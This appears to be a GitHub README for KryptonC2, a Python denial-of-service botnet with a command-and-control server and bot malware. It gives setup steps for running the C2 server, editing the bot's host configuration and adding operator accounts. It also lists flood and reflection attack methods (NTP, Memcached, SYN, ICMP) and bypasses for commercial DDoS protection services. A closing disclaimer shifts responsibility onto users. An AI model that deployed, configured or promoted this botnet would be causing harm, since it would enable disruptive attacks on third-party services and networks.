KryptonC2 is a basic open source denial of service botnet system written in Python 3, consists of a connect and control server and a bot malware script.
-
Install Git and Python 3 on your server.
-
Clone the KryptonC2 Github repository to your server via Git:
$ git clone https://github.com/CirqueiraDev/KryptonC2. -
Change the host address and C&C port in the configuration section in bot.py to your server address and C&C port.
-
Install the requirements.txt
-
Start the C2 server by executing the command:
$ python main.py. -
Add accounts in logins.txt using the format:
username:password:yyyy-mm-dd. -
Configure the port on the config.json
{ "cnc_host": "0.0.0.0", "reg_host": "0.0.0.0", "cnc_port": 5511, "reg_port": 5512 }. -
Connect to the server through PuTTY on a raw socket connection.
2023-12-04.21-40-51.mp4
📍 Compiling the malware and installing it on vulnerable devices won't be told as it's highly illegal to get remote access to devices without permission 779C . Use of this project for illegal activities is at own risk! I'm not responsible for any of your taken actions!
- New method
(HTTP SPOOFER) L7 Method. 11/11/2023 - New method
(NTP Reflection + Payload) L4 Method. 12/11/2023 - New method
(Memcached + Custom Payload) L4 Method. 12/11/2023 - New method
(POD) L3 Method. 13/11/2023 - New method
(ICMP) L3 Method. 13/11/2023 - Updated Method
(HTTP IO) L7 Method. 14/11/2023 - Added expiration date for accounts
(AAAA-MM-DD). 26/11/2023 - Update commands and visual. 02/12/2023
- New method
(SYN Flood) L4 methodand(ACK Flood) Removed. 04/12/2023 - Update visual and fix bugs. 01/22/2024
Method: OVH | Bypass OVHMethod: POST | POST FloodMethod: STRESS | Send HTTP Packet With High ByteMethod: OSTRESS | STRESS Without ProxyMethod: BYPASS | Bypass Normal AntiDDoSMethod: DGB | DDoS Guard BypassMethod: AVB | Arvan Cloud Bypass- Send attacks with API's
- Optimize malicious code
📌Source: https://github.com/NixWasHere/NixC2
KryptonC2 by:
- Discord: cirqueira

